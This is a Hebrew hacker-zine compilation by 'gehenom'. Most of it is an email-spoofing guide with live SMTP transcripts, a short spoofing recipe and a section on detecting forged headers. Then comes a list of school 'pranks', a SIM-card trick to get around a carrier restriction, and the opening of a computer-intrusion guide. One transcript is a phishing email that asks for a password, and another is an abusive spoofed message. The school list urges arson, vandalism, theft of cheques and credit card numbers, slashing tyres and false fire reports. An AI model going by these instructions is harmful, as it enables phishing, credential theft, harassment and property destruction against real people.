‫זה שאת התוכן של ה ‪ data‬עצמו אפשר גם לכתוב בעברית‪ .‬עכשיו נסיים את זה עם כמה אימיילים‬
‫מזויפים‬
‫ששלחתי‪ .‬דרך אגב‪ ,‬הכל פה אמיתי‪ .‬עשיתי לוגים מיוחד בשביל הטקסט הזה‪ .‬זה הכל הוקלט חי‬
‫מתוכנת הטלנט‪.‬‬
‫בסוף הדוגמאות‪ ,‬אני אראה לכם איך אתם יכולים גם להקליט את הזיופים שלכם‪ ,‬וכך תוכלו לעשות‬
‫עם זה‬
‫מש שאתם רוצים‪ ...‬להראות לחברים‪ ,‬להדפיס‪ ,‬או לא יודע מה‪ ...‬בכל אופן‪ ,‬הנה הדוגמאות‪:‬‬
‫‪smtp.***.com esmtp cpmta-3_2_3_0 - no uce 220‬‬
‫‪helo‬‬
‫‪.smtp.***.com hi-250‬‬

pipelining-250
auth=login-250
8bitmime 250
mail from: ***@***.net.il
ok 250
rcpt to: ***@***.com
ok 250
data
go ahead 354
date: 10 nov 12:31
subject: error in i/o section
from: *** support team
to: ***@****.com
!hello from ***.com
i'm sorry to inform you that there has been an error
in the i/o section of your account database, and this server's
,password information has been temporarily destroyed. we need you
.the *** user, to hit reply and type your password in the subject
,thank you for your help
.the *** support team
.
ok 973843116 qp 14873 250
quit
smtp.***.com closing connection 221
.‫בכל מקום שאתם רואים '***' זה אומר שמחקתי את מה שהיה ושמתי *** במקום‬
.‫ שולח ונמען‬,‫ החלטתי שעדיף שלא תדעו את שמות השרת‬.‫עשיתי את זה כדי לצנזר‬
‫ מה שעשיתי באימייל הזה זה שלחתי אימייל למשתמש של ספק‬,‫ כמו שאתם רואים‬,‫בכל מקרה‬
,‫מסויים‬
‫ הוא מתבקש לשלוח‬.‫כאשר הוא חושב שהוא קיבל את האימייל הזה מצוות התמיכה של אותו ספק‬
‫את הסיסמא‬
‫ התוכנת דואר אומרת לו‬,‫ כשהוא מגיב עם הסיסמא‬,‫ עכשיו‬.‫שלו בכדי שיוכלו לתקן איזה בעיה בשרת‬
‫שזה‬
‫ זה‬.‫ אבל מה שבאמת קורה זה שזה שולח את זה למישהו אחר‬,‫ של אותו ספק‬support team ‫נשלח ל‬
‫שולח את זה‬
‫ עכשיו לדוגמא‬.‫שמחתי זה לא עובד ככה בכל שרת דואר‬/‫ אבל לצערי‬.mail from ‫לכתובת שכתבנו ב‬
:‫הבאה‬
no uce( esmtp server ready at mon feb 12 00:24:26 2001( ***-220
esmtp spoken here 220
helo
helo requires domain address 501
helo ***.com
requested mail action okay, completed 250
rcpt to: ***@***.com
need mail before rcpt 503
mail from: webmaster@***.com
requested mail action okay, completed 250
rcpt to: ***@***.com

‫‪invalid address 550‬‬
‫‪rcpt to: ***@***.com‬‬
‫‪requested action not taken:user account inactive 550‬‬
‫‪rcpt to: ***@***.com‬‬
‫‪requested mail action okay, completed 250‬‬
‫‪data‬‬
‫‪>start mail input; end with <crlf>.<crlf 354‬‬
‫‪date: 13 nov 98 11:05‬‬
‫‪subject: fuck you‬‬
‫‪from: ***.com‬‬
‫‪to: ***@***.net‬‬
‫‪.hi there‬‬
‫‪.you better start shakin you fuckin asshole‬‬
‫‪.you damn jew hater. fuck it off. i took you site down‬‬
‫‪...if you put it back up, i'll take it down again‬‬
‫‪!no nazis aloud on the net‬‬
‫‪.suck it you motherfucker‬‬
‫‪.‬‬
‫‪requested mail action okay, completed 250‬‬
‫‪quit‬‬
‫‪service closing transmission channel 221‬‬
‫כמו שאתם רואים‪ ,‬באימייל הזה השרת לא הסכים לקבל את פקודת ה ‪ helo‬שלי‪ ,‬וביקש שאכתוב גם‬
‫דומיין‪.‬‬
‫רק אח"כ הוא נתן לי להמשיך‪ .‬כמו כן‪ ,‬לפני ה ‪ mail‬כתבתי ‪ rpct‬מה שגרם לשרת להגיד לי שלפני‬
‫שאני‬
‫כותב ‪ rcpt‬עלי לכתוב ‪ mail‬ורק אחרי זה אוכל לכתוב ‪ .rcpt‬אח"כ‪ ,‬כשכתבתי את ה ‪ rcpt‬הבא‪ ,‬השרת‬
‫העיר‬
‫לי שהכתובת אינה תקינה‪ .‬ובניסיון השני הוא העיר לי שהשם משתמש לא קיים‪ .‬רק בניסיון השלישי‬
‫הוא הסכים‪.‬‬
‫כלומר‪ ,‬שרתי הדואר הם בד"כ מאוד ידודיתיים ויש להם יכולת תקשור נוחה יותר‬
‫מאשר לשרתים אחרים כגון ‪ pop‬או ‪ .http‬טוב‪ ,‬עכשיו כמו שהבטחתי מקודם‪ ,‬אני אראה לכם איך גם‬
‫אתם יכולים להקליט את הזיופים שלכם‪.‬‬
‫פיתחו את חלון ה ‪ .telnet‬למי שלא זוכר‪ ,‬לוחצים על התחל‪ ,‬הפעלה‪ ,‬ואז מקלידים ‪.telnet‬‬
‫כעת לחצו על תפריט ה ‪ terminal‬ובחרו ב ‪ .start logging‬אתם תתבקשו להקליד את שם הקובץ‬
‫שעליו‬
‫ברצונכם להקליט את הזיוף‪ .‬לדוגמא‪ c:\fake :‬או ‪ .c:\yonatan\hacking\test‬מה שבא לכם‪...‬‬
‫אח"כ תתחברו לשרת הדואר ותעשו מה שאתם רוצים‪( .‬או כל שרת בעצם‪ ,‬לאו דווקא דואר‪)...‬‬
‫כשאתם גומרים ורוצים לסיים את ההקלטה‪ ,‬בחרו ב‪ ,terminal :‬ואז ‪.stop logging‬‬
‫עכשיו סגרו את חלון הטלנט‪ ,‬ופיתחו את הקובץ שעליו הקלטתם‪ .‬לקובץ יהיה סיום של ‪.log‬‬
‫לדוגמא‪:‬‬
‫‪test.log‬‬
‫‪cool.log‬‬
‫‪fuckit.log‬‬
‫וכו'‪.....‬‬

‫זהו‪ .‬רק דבר אחרון לפני שאתם עוברים לחלק השלישי והאחרון‪,‬‬
‫הרבה שרתים תומכים בפקודה מאוד יעילה‪ ,‬והיא פקודת ‪.help‬‬
‫נסו את זה בכמה שרתי דואר שונים‪ .‬שחקו עם זה‪ .‬זה יכול לעזור לכם מאוד לפעמים‪.‬‬
‫מקווה שהבנתם משהו‪,‬‬
‫‪gehenom‬‬

‫זיוף ‪ - email‬חלק ‪3‬‬
‫"‪"the minute that it's born it begins to die ...‬‬
‫( ‪)marilyn manson‬‬
‫הגעתם לחלק האחרון של המדריך השלם לזיוף אימייל‪.‬‬
‫אתם לא ממש מוזמנים לפה‪ ,‬אף אחד לא ביקש ממכם לבוא‪ ,‬ואתם גם לא הכי רצויים‪ ,‬אבל אתם‬
‫כאן‪.‬‬
‫אז אם אתם כבר כאן‪ ,‬בואו נתחיל‪ .‬בחלק זה אני אראה לכם פקודות חדשות ושימושיות‪ .‬ואת האמת‪,‬‬
‫גם ממש ממש מגניבות‪ .‬חוץ מזה אתם גם תלמדו איך לבדוק אם האימייל שקיבלתם מזויף או לא‪,‬‬
‫וגם איך‬
‫לאתר את הזייפן הבן זונה‪ .‬טוב‪ ,‬נתחיל עם הפקודות המיוחדות החדשות‪ .‬אני בטוח שתיהנו לשחק‬
‫אייתם‪.‬‬
‫אני אראה לכם פה ‪ 3‬פקודות מגניבות‪ .‬שלושת הפקודות הם‪:‬‬
‫‪rset‬‬
‫‪vrfy‬‬
‫‪noop‬‬
‫הראשון‪ ,rset ,‬תפקידו זה לעשות ‪ reset‬למידע ששלחתם לשרת עד עכשיו‪.‬‬
‫כלומר למחוק הכל‪ .‬לדוגמא‪ ,‬התחלתם זיוף אימייל‪ ,‬הגעתם כמעט לסוף‪ ,‬ופתאום החלטתם שיצא‬
‫חרא ואתם רוצים להתחיל מהתחלה‪ ,‬כל שעליכם לעשות הוא להקליד את הפקודה ‪ rset‬וזהו‪.‬‬
‫עכשיו אתם יכולים להתחיל מחדש‪ .‬הפקודה הבאה שלנו היא ‪ .vrfy‬מה שפקודת ה ‪ vrfy‬עושה זה‬
‫בודקת‬
‫אם משתמש מסויים קיים במערכת‪.‬‬
‫לדוגמא אתם רוצים לדעת אם כתובת האימייל ‪ slut@zahav.net.il‬באמת קיימת‪,‬‬
‫אתם מתחברים לשרת הדואר של אינטרנט זהב‪ ,‬ומקלידים‪:‬‬
‫‪vrfy slut‬‬
‫השרת יגיד לכם אם החשבון ‪ slut‬אכן קיים או לא‪ .‬זה יכול להיות מאוד מאוד יעיל במקרים‬
‫מסוימים‪,‬‬
‫אך בד"כ משתמשים בזה חברות מסחריות שרוצות לשלוח לכם מליון‬
‫פרסומות מעצבנות כי הם חושבים שהם ירוויחו מזה כסף ולא קולטים‬
‫שהם סתאם מעצבנים וגורמים לנו לשנוא אותם ואת המוצרים המחורבנים שלהם‪.‬‬
‫טוב‪ ,‬לפקודה הבאה והאחרונה‪ .‬הפקודה ‪ noop‬היא פקודה שתפקידה לעשות‪ ....‬כלום‪.‬‬
‫הפקודה ‪ noop‬לא עושה כלום‪ .‬זה מה שמיוחד ומגניב בא‪ .‬תנסו בעצמכם‪ .‬מומלץ מאוד‪ .‬הפקודה‬
‫קיימת בהרבה מאוד שרתי דואר‪ .‬אז למה היא קיימת אם היא לא עושה כלום? כי את האמת היא כן‬
‫עושה משהו‪...‬‬
‫רק לא משהו שממש נראה לעין‪ .‬היא פשוט מאוד נקלטת לשרת‪ ,‬ובד"כ גם מחזירה פלט אל מסך‬
‫המחשב שלכם האומר‬
‫שהפקודה נקלטה‪ ,‬התקבלה וכו'‪ .‬כלומר‪ ,‬זה יכול להיות יעיל כדי לבדוק שהחיבור בסדר‪ ,‬או סתאם‬
‫את מהירות‬
‫תגובת שרת הדואר וכל מיני שטויות כאלה‪...‬‬
‫גילוי אימייל מזויף ואיתור הבן זונה‬
‫עכשיו נגיד קיבלתם אימייל והוא נראה לכם חשוד‪ .‬איך בודקים בוודאות?‬

‫מסתכלים בראשים (‪ )headers‬של המכתב‪ .‬איך עושים את זה? זה קצת שונה עם כל תוכנה‪,‬‬
‫אבל תחפשו את האופציה באפשרויות (‪ )settings‬של תוכנת הדואר שלכם‪ .‬כנ"ל גם לאלה שהאימייל‬
‫שלהם‬
‫הוא ‪ .web based email‬כלומר שהאימייל שלהם הוא ב ‪ newmail‬או ‪ hotmail‬וכו'‪ .‬עכשיו‪ ,‬אחרי‬
‫ששיניתם‬
‫את ההגדרות של תוכנת הדואר שלכם להראות את ה ‪ headers‬של כל אימייל‪ ,‬עיברו לקריאת‬
‫האימייל שנראה לכם‬
‫חשוד‪ ,‬והתבוננו ב ‪ .headers‬אם זו הפעם הראשונה שאתם עושים זאת‪ ,‬סביר להניח שזה ייראה לכם‬
‫כמו סתאם‬
‫שטויות באנגלית‪ .‬אבל זה בעצם אינפורמציה יעילה שיכולה לעזור לכם‪.‬‬
‫ובכן‪ ,‬בכל תוכנת דואר הראשים (‪ )headers‬ייראו קצת שונה‪ ,‬ולכן אני אתן פה כמה טיפים לגילוי זיוף‬
‫אימייל שיעבדו גם בתוכנות שבהם מאוד קשה לגלות אם זה מזויף או לא‪ .‬ובכן‪ ,‬דבר ראשון‪ ,‬באימייל‬
‫אמיתי‪,‬‬
‫יהיו בד"כ יותר הסברים והגדרות כי זה נשלח ע"י תוכנת דואר‪ .‬לכן הראשים יהיו בד"כ ארוכים‪.‬‬
‫באימייל מזויף לעומת זאת‪ ,‬שנעשה בד"כ ידנית‪ ,‬לא יהיה הרבה פרטים בראשים‪ ,‬והם יהיה הרבה‬
‫יותר קצרים‪.‬‬
‫עכשיו בואו תראו משהו אחר‪ .‬נשווה פה בין ‪ 2‬אימיילים מזויפים ששלחתי לעצמי‪ .‬אחד ל‬
‫‪altavista.com‬‬
‫ואחד ל ‪.hotmail.com‬‬
‫בואו נראה קודם את האחד ב ‪:hotmail.com‬‬
‫‪from admin@hotmail.com.com sat dec 09 16:34:21 2000‬‬
‫‪received: from [212.179.186.110] by hotmail.com )3.2( ; sat dec 09 16:32:54 2000‬‬
‫‪subject: congradulations‬‬
‫‪date: sat dec 09‬‬
‫כמו שאתם רואים השלוח טוען שהוא ‪admin@hotmail.com.com‬‬
‫אבל כתוב שכתובת האיי פי שלו היא ‪212.179.186.110‬‬
‫אם נבדוק את האיי פי של ‪ hotmail.com‬נראה שזה בכלל ‪64.4.11.7‬‬
‫כלומר יש לנו פה שתי מחשבים מאוד שונים‪ .‬כמו כן אם נבדוק את הכתובת של ‪212.179.186.110‬‬
‫אנחנו‬
‫נראה שזה בעצם ‪ .bzq-186-110.bezeqint.net‬כלומר משתמש של בזק בינלאומי‪** .‬בום** תפסנו‬
‫אותו‪.‬‬
‫עכשיו באלטה ויזטה המצב מאוד דומה‪:‬‬
‫‪from: admin@nba.com‬‬
‫‪date: sun 11 november‬‬
‫‪subject: congradulations‬‬
‫‪)received: from unknown )helo nba.com( )212.179.186.110‬‬
‫‪by smtp.altavista.com )209.228.13.94( with smtp; 9 dec 2000 16:46:20 -0800‬‬
‫הפעם השולח טוען שהוא ‪admin@nba.com‬‬
‫לכן נבדוק את האיי פי של ‪ nba.com‬ומתברר לנו שזה ‪204.202.128.223‬‬
‫מה שלא ממש דומה ל ‪ 212.179.186.110‬אשר מתברר להיות אותו משתמש של בזק בינלאומי‬
‫ממקודם‪.‬‬
‫כמו כן יש לנו כאן את כתובת השרת דואר שקיבל את המכתב‪209.228.13.94 .‬‬

‫אנחנו מקבלים את התאריך והשעה המדויקים של מתי נשלח המכתב‪ .‬שחקו עם זה‪...‬‬
‫שוב‪ ,‬אני ממש ממש ממליץ לקרוא את ‪ rfc 821‬לכל מי שיודע אנגלית‬
‫או שסתאם רוצה להעמיק את הידע באימייל‪ .‬קריאת ה ‪ rfc‬תיתן לכם הרבה יותר הבנה של הנושא‪.‬‬
‫מקווה ש ‪ 3‬העמודים הארוכים והמשעממים האלה על אימייל עזרו לכם במשהו‪,‬‬
‫‪gehenom‬‬

‫מדריך זיוף ‪ email‬מקוצר‬
‫[‪ :::::‬הערה ‪ -‬אל תגידו שאתם לא מבינים ותפסיקו לקרוא‪ .‬תקראו עד הסוף ותבינו!!! ‪]:::::‬‬
‫[‪ ::‬למי שעוד לא הבין מה אני רוצה ממנו‪ ,‬תקראו עד הסוף סוף סוף‪ .‬כי בהתחלה הכל לא מובן‪]:: ,‬‬
‫[‪ ::‬ואם קוראים עד הסוף אז הכל כן מובן‪ .‬יפה‪ .‬אז עכשיו תקראו מההתחלה עד הסוף‪ .‬בלי להפסיק‬
‫באמצע‪]:: .‬‬
‫שוב‪ ,‬תקראו עד הסוף‪ .‬גם אם אתם חושבים שלא מבינים כלום‪ .‬תקראו עד הסוף‪ .‬סוף‪ .‬סוף‪.‬‬
‫סוף‪.‬‬
‫אוקי‪ ,‬יא בני זונות עצלנים כוס אימא שלכם‪,‬‬
‫אז בגלל שלרובכם אין כוח לקרוא ‪ 3‬עמודים מלאים על זיוף אימייל כתבתי פה מדריך מקוצר‪.‬‬
‫חסר לכם שאתם לא נהנים ממנו‪ .‬תפיצו את המדריך הזה‪ .‬תנו עותק לכל בנאדם שאתם מכירים‪ .‬טוב‪,‬‬
‫נתחיל‪.‬‬
‫הוראות‪ :‬מתחברים לשרת הדואר‪ ,‬לפורט ‪ .25‬שם כותבים את הפקודות הבאות‪:‬‬
‫‪helo‬‬
‫‪mail from: hacker@hackers.com‬‬
‫‪rcpt to: victim@victim.com‬‬
‫‪data‬‬
‫‪subject: fake email‬‬
‫‪date: mon 23 october‬‬
‫‪this is a fake email‬‬
‫‪have a nice day you bitch‬‬
‫‪.‬‬
‫‪quit‬‬
‫טוב‪ .‬עכשיו כמה הסברים‪:‬‬
‫‪ = hacker@hackers.com‬כתבו במקום את הכתובת שממנה אתם רוצים לשלוח את האימייל‬
‫‪ = victim@victim.com‬כתבו במקום את הכתובת שתקבל את האימייל המזויף‬
‫‪ = fake email‬כתבו כאן את הנושא של האימייל‪ .‬או הכותרת אם אתם רוצים‪( .‬אותו דבר)‬
‫‪ = mon 23 october‬כתבו כאן את התאריך‪ .‬אפשר גם להוסיף שעה כמובן‪.‬‬
‫אפשר גם לכתוב שזה נשלח לפני ‪ 1000‬שנה או ההפך‪ ,‬בשנת ‪ ,4072‬איך שאתם רוצים‪ .‬שחקו עם זה‪.‬‬
‫‪this is a fake email‬‬
‫‪ = have a nice day you bitch‬כתבו כאן את המכתב עצמו‪ .‬אפשר גם בעברית‪.‬‬
‫ודרך אגב‪ ,‬גם את הנושא (או הכותרת לאלה מכם שרוצים) אפשר לכתוב בעברית‪.‬‬
‫רק הערה אחרונה‪ ,‬ואחרונה באמת‪ :‬איך מתחברים לשרת הדואר לפורט ‪??25‬‬
‫ככה‪:‬‬
‫* לחצו על התחל‬
‫* לחצו על הפעלה‪...‬‬

‫* הקלידו‪telnet server 25 :‬‬
‫‪ = server‬כתובת של שרת דואר‬
‫לדוגמא‪ ,‬אם ניקח את הדוגמא מקודם סביר להניח שהשרת דואר היה ‪mail.victim.com‬‬
‫ולכן הייתם מקלידים‪telnet mail.victim.com 25 :‬‬
‫עוד אפשרויות לכתובת נפוצות‪:‬‬
‫‪smtp.victim.com‬‬
‫מה שכבר היה‪mail.victim.com ,‬‬
‫ואחרון חביב ‪victim.com‬‬
‫אז נגיד אתם מזייפים למישהו ב ‪ altavista.com‬אתם תקלידו‪telnet mail.altavista.com 25 :‬‬
‫ואם לא עובד תנסו ‪ smtp.altavista.com‬ואם גם זה לא‪ ,‬אז פשוט ‪ altavista.com‬פשוט‪ ,‬פשוט‪,‬‬
‫פשוט‪.‬‬
‫אם יש בעיות‪ ,‬תקראו את הכתבה המלאה של ה ‪ 3‬עמודים‪ .‬זהו‪ .‬תיהנו‪ .‬שלכם‪,‬‬
‫‪gehenom‬‬

‫דברים כייפים לעשות בבית ספר ‪2 -‬‬
‫לאור הפופלריות של החלק הראשון‪ ,‬צוות האתר החליט לכתוב עוד כתבה בנושא‬
‫'איך ליהנות במקום המחורבן הנקרא בית ספר'‪ .‬אנחנו בטוחים שתיהנו‪ ,‬ומקווים שתבינו‬
‫מה באמת טוב בשבילכם ומי אתם באמת‪ ,‬ושלא תיתנו לבני זונות להשתלט לכם על המוח‪.‬‬
‫טוב‪ ,‬חאלס עם ההקדמה‪ ,‬הנה כל הרעיונות שקפצו לנו לראש‪:‬‬
‫* קחו דבק מגע‪ ,‬ומירחו אותו בנדיבות על כל המנעולים בבית הספר‪.‬‬
‫אח"כ תביטו איך המורים מנסים להכניס את המפתח למנעול‪ .‬הם פשוט מנסים‪ ,‬ומנסים‪ ,‬ומנסים‪...‬‬
‫* אם יש לכם טלוויזיה בבית ספר‪ ,‬ציירו על המסך עם טיפקס‪.‬‬
‫* כשהמסדרונות מלאים‪ ,‬קחו כמה חברים‪ ,‬ותטענו שאתם מחפשים את העדשות מגע שלכם‪,‬‬
‫ושחשוב מאוד שאף אחד לא יזוז‪ ,‬כי מישהו יכול בטעות לדרוך על זה‪...‬‬
‫* מירחו שפתון‪ ,‬דבק‪ ,‬בוץ‪ ,‬או קקי על הידית של הדלת של החדר מורים ושל חדר המנהל‪.‬‬
‫* כייסו מבית מרקחת תרופות נגד הקשת נחש‪ .‬לכו ליד חדר המנהל‪ ,‬תבלעו כדור או שניים‪ ,‬ותיכנסו‬
‫פנימה‪.‬‬
‫התרופה תגרום לכם להקיא‪ .‬תשתדלו להקיא על הכיסא‪ ,‬השטיח‪ ,‬ספרים‪ ,‬וכל מה שנמצא שם‪.‬‬
‫* פרצו את תיבות הדואר של המורים שלכם‪ .‬צלמו עותקים של כל דבר מעניין וחלקו לחברים‪ .‬תרגישו‬
‫חופשי‬
‫להשתמש בצ'קים‪ ,‬כסף מזומן שלפעמים תמצאו‪ ,‬והכי מגניב‪ ,‬אם יהיה לכם מזל‪ ,‬זה מספר כרטיס‬
‫האשראי‪.‬‬
‫* השאירו פתקים ורמזים בכל מקום על כך ש "יום רביעי זה יום הצדק"‬
‫* ביום רביעי אל תעשו כלום‪.‬‬
‫* ביום חמישי אל תעשו כלום‪.‬‬
‫* ביום שישי אל תעשו כלום‪.‬‬
‫* בשבת לכו לבית ספר ותהרסו כל מה שאתם רואים‪ .‬מומלץ להצטייד בפטיש‪ ,‬בנזין‪ ,‬מצית‪,‬‬
‫סכין‪ ,‬והרבה הרבה הרבה אבל באמת שהרבה מצב רוח טוב‪.‬‬
‫* השיגו כמה שיותר דברים חתומים עם חתימת המורה שלכם (הודעות‪ ,‬מבחנים‪ ,‬אישורים‪ ,‬וכו')‪,‬‬
‫ושבו עם הכל כמה שעות ותתחילו לנסות לתרגל את שיטת החתימה שלו‪.‬‬
‫כשתגיעו לרמת זיוף איכותית‪ ,‬תמצאו את החתימה שלו כמשהו שימושי מאוד‪.‬‬
‫* תהיו נחמדים למורים שלכם‪ ,‬והזמינו בשבילם פיצה לבית‪ .‬עשו זאת בשמם ועל חשבונם כמובן‪.‬‬
‫אל תישכחו להזמין מנה משפחתית גדולה עם כל התוספות‪ ,‬ואני חושב שהם גם יירצו לשתות הרבה‪.‬‬
‫ואל תשכחו גלידה‪ ,‬כי אולי הם גם יירצו גם קצת גלידה אחר כך‪...‬‬
‫* אחרי שהם צעקו שעות על איש המשלוח‪ ,‬ונאלצו לשלם ולהיתקע עם הפיצה‪,‬‬
‫אני בטוח שהם ישמחו לקבל ביקור ממכבי האש שיבואו להציל אותם מ"שריפה במטבח"‬

‫או כל שריפה אחרת שתירצו לספר עליה למכבי האש דרך הטלפון‪...‬‬
‫* לכו לשירותים בבית הספר וסתמו את הנקז בכיור עם‬
‫פלסטלינה ותנו לכל המים להשתחרר מהברז‪ .‬עשו זאת בסוף היום‪,‬‬
‫אחרי שכולם כבר הלכו הביתה‪ .‬ביום למחרת כל הבית ספר יהיה מוצף מים‪....‬‬
‫* מורים רבים נוטים להשאיר את היומן שלהם במצבים ומקומות לא מוגנים‪ .‬נצלו זאת בחוכמה‪.‬‬
‫* תתלשו את הסמלים מהמכוניות של המורים שלכם‪ .‬כל סמל עולה בשוק כמאה‪ ,‬מאה חמישים‬
‫שקל‪.‬‬
‫מכירו את הסמלים לאספנים או הוסיפו אותם לאוסף משלכם‪.‬‬
‫* תארגנו שביתה של כל השכבה והתנחלו במסדרון או ליד חדר המורים‪.‬‬
‫* הצטיידו במסמר או שניים ותעשו פנצ'רים בגלגלים של המכוניות של המורים שלכם‪.‬‬
‫כל יום תבחרו מכונית אחרת בצורה אקראית‪ .‬זה הופך את הכיף לגדול יותר‪...‬‬
‫* תנו לכמה תרנגולים או סנאים להסתובב חופשי בבית הספר‪.‬‬
‫השתמשו בלפחות ‪ 5‬תרנגולים‪/‬סנאים וזכרו כי כל המרבה הרי זה משובח‪.‬‬
‫* לכו לשירותים והכניסו כל מיני חפצים כמו כדור טניס‪ ,‬מכונית צעצוע‪ ,‬בובת פוקימן‪ ,‬בלון מנופח‪,‬‬
‫וכו' לתוך האסלה ולאחר מכן הורידו את המים‪ .‬עשו זאת שוב ושוב ושוב עד שכבר אי אפשר להוריד‬
‫את המים‪.‬‬
‫* הניחו שעונים מעוררים בכל מיני מקומות מוסתרים בבית הספר‪ .‬אל תשכחו להפעיל אותם קודם‪.‬‬
‫* תארגנו שילד ישכב על הפנים לכיוון הרצפה‪ .‬כשמורה ויתקרב לאזור‬
‫צירחו בהיסטריות משהו כמו "הוא קפץ!‪ ,‬הוא קפץ" והצביעו לכיוון חלון בקומה שלישית או משהו‪.‬‬
‫* התקשרו מהפלאפון לבית הספר ותעמידו פנים שאתם האבא של איזה ילד בבית הספר‪,‬‬
‫ושיישלחו אותו _עכשיו_ הביתה ושהוא צריך לחזור מהר כי סבתא נפטרה או כי יש מסיבה‬
‫משפחתית לדוד מוטי‬
‫או כל דבר אחר שתחליטו להפליץ‪ .‬תחשבו על סיבות משלכם‪ .‬מקסימום אפשר להגיד שזה בגלל‬
‫אירוע משפחתי‬
‫או שזה משהו אישי וכו'‪.‬‬
‫* פחחחחחחחחחחחחחחחחחחחחחחח‪.....‬‬
‫חשבתם שיש עוד???? צדקתם‪ .‬נו‪ ,‬תעברו ל'*' הבאה‪.‬‬
‫* לכו לקומה שנייה או שלישית בבית הספר‪ ,‬כאשר כמה שיותר גבוה יותר טוב‪.‬‬
‫כעת שחקו את משחק היריקות ע"פ החוקים הבאים‪:‬‬
‫ פגיעה בילד‪/‬ילדה מורידה ‪ 3‬נקודות‬‫ פגיעה במורה מוסיפה ‪ 10‬נקודות‬‫ פגיעה בבעל חיים מוסיפה נקודה‬‫ פגיעה בכל דבר אחר לא עושה כלום‬‫הערות אחרונות‪:‬‬
‫מומלץ להתכופף אחרי כל יריקה כדי שלא ייראו אתכם‪.‬‬

‫המנצח הוא מי שמגיע ראשון ל ‪ 50‬נקודות‪.‬‬
‫כל החוקים פתוחים לשינויים‪.‬‬
‫למי שלא הבין המשחק פועל בדרך הבאה‪ :‬כל אחד יורק בתורו וצובר נקודות (או שלא)‪ .‬תיהנו‪.‬‬
‫* קחו כמה שקיות ניילון שקופות ומלאו אותם בקמח‪ .‬כעת החביאו אותם בכל מיני מקומות שיפחידו‬
‫את מי שיימצא אותם‪ .‬מקומות מומלצים הם באמצע איזה ספר‪ ,‬מתחת לספר‪ ,‬בתוך קלמר‪ ,‬בתוך‬
‫תיק‪ ,‬בתוך ארנק‬
‫או כל מקום אחר של הילדים שהם המטרה שלכם‪ .‬מומלץ שגם תשימו קצת מלח פה ושם למקרה‬
‫שהם ינסו להסניף‬
‫את החומר ואז תשמעו הרבה אאאאאההההההה פצ'ווווווווו ו אאאאאייייייייייייייככככססס‪....‬‬
‫* ולסיום‪ ,‬משהו שכולם מכירים אבל קצת נשכח בשנתיים שלוש האחרונות‪.‬‬
‫קחו עת‪ ,‬או טוש (לורד)‪ ,‬ופרקו את שני הקצוות שלו כך שיישאר לכם מעין קשית פלסטיק‪.‬‬
‫כעת גלגלו כדור קטן של פלסטלינה ושימו אותו בקצה אחד‪ .‬עכשיו תנשפו חזק בקצה השני‬
‫והפלסטלינה תעוף‪.‬‬
‫שחקו עם זה קצת עד שתלמדו להעיף ולכוון טוב‪ .‬אם אין פלסטלינה תמיד אפשר להשתמש בנייר‪.‬‬
‫מומלץ להרטיב אותו לפני שיורים וככה הוא עף יותר טוב‪.‬‬
‫למי שלא מכיר‪ ,‬לכלי הנשק המפגר אך המהנה הזה קוראים טפו טפו‪.‬‬
‫זהו‪ ,‬כאן תם החלק השני של 'איך לכייף בבית הספר'‪.‬‬
‫תדפיסו את מה שקראתם עכשיו‪ ,‬תצלמו כמה עשרות עותקים‪,‬‬
‫תחלקו לחברים‪ ,‬ותיהנו‪.‬‬
‫שלכם‪,‬‬
‫‪gehenom‬‬

‫אייקונים בביג טוק‬
‫בזמן האחרון‪ ,‬שמעתי מהרבה אנשים‪ ,‬הרבה תלונות‪ ,‬על כך שהם לא יכולים להשתמש בשירות‬
‫האייקונים של אורנג' מהסיבה הפשוטה שיש להם ביג טוק‪ .‬ובכן‪ ,‬לכל הביג טוקים עם ה ‪5110‬‬
‫שלהם‪ ,‬שרוצים לשים אייקון בפלאפון וחשבו שהם לא יכולים‪ ,‬אז טעיתם‪ .‬כי ממעמקי הצד האפל‬
‫של הגיהינום‪ ,‬אני בא אליכם‪ ,‬עם ‪ 100%‬רוע טהור‪ ,‬אני הוא גיהינום‪ ,‬שיראה לכם איך לרמות על הבני‬
‫זונות‪.‬‬
‫ובכן‪ ,‬השיטה פשוטה וקלה ביותר‪ ,‬ואני מתקשה להבין איך אתם הקוראים החכמים שלי לא חשבתם‬
‫על זה לבד‪.‬‬
‫אז ככה‪ ,‬טכנית‪ ,‬הדגם שלכם מסוגל להשתמש באייקונים‪ .‬אבל מה‪ ,‬אורנג' משום מה החליטה‬
‫שמי שיש לו ביג טוק‪ ,‬לא יכול‪ .‬למה? לא יודע‪.‬‬
‫אז איך דופקים אותם?‬
‫קחו פלאפון של מישהו אחר‪ ,‬מאותו דגם‪,‬‬
‫(אם לכם יש ‪ ,6110‬אז קחו ‪ .6110‬אם יש לכם ‪ ,5110‬אז קחו ‪)5110‬‬
‫בעצם זה לא חייב להיות מאותו דגם‪ ,‬אבל סתאם שיהיה יותר מגניב קחו מאותו דגם‪,‬‬
‫ושבעל הפלאפון הזה לא יהיה רשום בשירות ביג טוק‪ ,‬ככה שאצלו שירות האייקונים לא יהיה חסום‪.‬‬
‫זה יכול להיות כל דבר חוץ מביג טוק‪ .‬שיהיה אורנג' בי יו‪ ,‬אורנג' משפחה‪ ,‬זה לא משנה‪...‬‬
‫עכשיו החליפו אייתו את כרטיס ה ‪.sim‬‬
‫איך מחליפים כרטיס ‪?sim‬‬
‫קודם כל תכבו את המכשיר‪.‬‬
‫עכשיו תוציאו את הסוללה מהפלאפון‪ ,‬ושם תראו את מחזיק ה ‪.sim‬‬
‫פיתחו אותו‪ ,‬ושילפו בעדינות את הכרטיס‪ .‬כעת שימו אותו בצד‪,‬‬
‫ותכניסו בפנים את הכרטיס מהפלאפון השני‪.‬‬
‫החזירו את הסוללה למקום‪ ,‬והפעילו את הפלאפון‪.‬‬
‫עכשיו אורנג' לא תזהה שיש לכם ביג טוק‪ ,‬כי מבחינה טכנית כרגע אין לכם‪,‬‬
‫לכן שילחו לעצמכם איזה אייקון שבא לכם‪.‬‬
‫אחרי שהוספתם לכם אייקון פצצה‪ ,‬החליפו בחזרה את כרטיס ה ‪ ,sim‬ונחשו מה? האייקון יישאר‪.‬‬
‫למה? כי הוא נשמר על המכשיר ולא על הכרטיס‪ .‬מקווה מאוווד שתהנווו‪,‬‬
‫‪gehenom‬‬

‫פריצה למחשבים‬
‫כן‪ ,‬זה נכון‪ ,‬אני עומד להסביר לכם צעד אחר צעד ובעברית‪,‬‬
‫איך מהמחשב האישי שלכם בבית‪ ,‬תוכלו לפרוץ למחשבים אחרים‪.‬‬
